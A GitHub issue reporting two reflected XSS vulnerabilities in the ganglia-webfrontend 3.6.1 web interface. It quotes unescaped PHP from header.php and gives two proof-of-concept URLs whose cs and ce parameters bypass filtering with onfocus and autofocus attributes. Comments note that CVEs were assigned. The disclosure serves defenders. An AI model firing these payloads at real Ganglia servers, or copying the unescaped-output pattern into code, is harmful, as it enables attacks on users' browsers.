Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Two XSS issue found in 3.6.1 #351

Open
1iK3 opened this issue Dec 17, 2019 · 2 comments
Open

Two XSS issue found in 3.6.1 #351

1iK3 opened this issue Dec 17, 2019 · 2 comments

Comments

@1iK3
Copy link

@1iK3 1iK3 commented Dec 17, 2019

When I visited the installed web page , I found this version has 2 Reflect Cross-site scripting (XSS) in the page. I found the apt-get installed the version 3.6.1 of ganglia-webfrontend default, maybe there are many ganglia users used apt-get to installed this ganglia-webfrontend version.

header.php
411 $custom_time = "or <span class="nobr">from <input type="TEXT" title="$examples" NAME="cs" ID="datepicker-cs" SIZE="17"";
412 if ($cs)
413 $custom_time .= " value="$cs"";
414 $custom_time .= "> to <input type="TEXT" title="$examples" name="ce" ID="datepicker-ce" SIZE="17"";
415 if ($ce)
416 $custom_time .= " value="$ce"";
417 $custom_time .= "> <input type="submit" value="Go">\n";

There some xss protect in the systen but can be by pass. attacter can use “onfocus” and “autofocus” to bypass.
url1:
/ganglia/?r=hour&cs=&ce=hou7z%22%20onfocus%3ddocument.location%3d1%20autofocus%3d%20oqqfa&c=unspecified&h=&tab=m&vn=&hide-hf=false
url2:
/ganglia/?r=hour&cs=quxfd%22%20onfocus%3ddocument.location%3d1%20autofocus%3d%20wp7f3&ce=&c=unspecified&h=&tab=m&vn=&hide-hf=false

Please confirm is it a serurity vulnerability .

@1iK3 1iK3 changed the title Two XSS issue found in Two XSS issue found in 3.6.1 Dec 17, 2019
@carnil

This comment has been minimized.

Copy link

@carnil carnil commented Jan 11, 2020

Two CVEs were aparently assigned: CVE-2019-20378 and CVE-2019-20379.

@NicoleG25

This comment has been minimized.

Copy link

@NicoleG25 NicoleG25 commented Jan 12, 2020

@vvuksan is there any plan to address these vulnerabilities? :)
Cheers !

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
3 participants
You can’t perform that action at this time.